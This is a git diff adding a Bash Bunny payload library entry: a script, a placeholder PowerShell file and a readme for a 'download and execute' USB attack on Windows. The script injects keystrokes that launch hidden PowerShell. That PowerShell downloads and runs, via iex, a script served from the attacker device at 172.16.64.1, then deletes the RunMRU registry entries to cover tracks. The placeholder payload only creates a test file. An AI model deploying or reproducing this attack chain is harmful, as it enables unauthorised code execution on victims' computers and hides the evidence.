diff --git a/payloads/library/psh_DownloadExec/payload.txt b/payloads/library/psh_DownloadExec/payload.txt new file mode 100644 index 00000000..a87b5910 --- /dev/null +++ b/payloads/library/psh_DownloadExec/payload.txt @@ -0,0 +1,69 @@ +#!/bin/bash +# +# Title: Powershell Download and Execute +# Author: LowValueTarget +# Version: 1.1 +# Category: Powershell +# Target: Windows XP SP3+ (Powershell) +# Attackmodes: HID, RNDIS_ETHERNET +# Firmware: >= 1.1 +# +# OPTIMIZED FOR BASHBUNNY 1.1_x+ +# +# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory +# +# | Attack Stage | Description | +# | ------------------- | ---------------------------------------- | +# | Stage 1 | Running Initial Powershell Commands | +# | Stage 2 | Turning up web server and DHCP | +# | Stage 3 | Delivering powershell payload | +# + +LED SETUP + +# Set working dir +PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION +cd $PAYLOAD_DIR +SERVER_LOG=server.log + +# Fresh Server Log +rm -f $SERVER_LOG +# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+) +echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all + +# Check for psh.txt +if [ ! -f $PAYLOAD_DIR/psh.txt ]; then + LED FAIL + exit 1 +fi + +# Attack HID +ATTACKMODE HID +LED STAGE1 + +# Attack +RUN WIN "powershell -WindowStyle Hidden \"while (\$TRUE) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { iex (New-Object Net.WebClient).DownloadString('http://172.16.64.1/psh.txt'); (New-Object Net.WebClient).DownloadString('http://172.16.64.1/COMPLETE'); exit } }\"" + +# Wipe prints +RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"" + +# Attack Ethernet +LED STAGE2 +ATTACKMODE RNDIS_ETHERNET + +# Start web server +iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately +python -m SimpleHTTPServer 80 > $SERVER_LOG 2>&1 & + +# wait until python web server is listening +while ! nc -z localhost 80; do sleep 0.2; done + +# Re-enable ICMP/echo replies to trip the powershell stager +echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all +LED STAGE3 + +while ! grep -Fq "GET /COMPLETE" $SERVER_LOG; do + sleep .5 +done + +LED FINISH diff --git a/payloads/library/psh_DownloadExec/psh.txt b/payloads/library/psh_DownloadExec/psh.txt new file mode 100644 index 00000000..40a4bc23 --- /dev/null +++ b/payloads/library/psh_DownloadExec/psh.txt @@ -0,0 +1 @@ +powershell "New-Item $ENV:UserProfile\Desktop\psh_downloadexec_test.txt -ItemType file" diff --git a/payloads/library/psh_DownloadExec/readme.md b/payloads/library/psh_DownloadExec/readme.md new file mode 100644 index 00000000..f2f6e1e7 --- /dev/null +++ b/payloads/library/psh_DownloadExec/readme.md @@ -0,0 +1,26 @@ +# psh_DownloadExec +## Powershell Download and Execute + +* Author: LowValueTarget +* Version: Version 1.1 +* Target: Windows XP SP3+ (Powershell) +* Category: Powershell +* Attackmodes: HID, RNDIS_Ethernet +* Firmware: >= 1.1 + +## Description + +Quick HID attack to retrieve and run powershell payload from BashBunny web server. + +## Configuration + +Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed. + +## STATUS +``` +| Attack Stage | Description | +| ------------------- | ---------------------------------------- | +| Stage 1 | Running Initial Powershell Commands | +| Stage 2 | Turning up web server and DHCP | +| Stage 3 | Delivering powershell payload | +``` \ No newline at end of file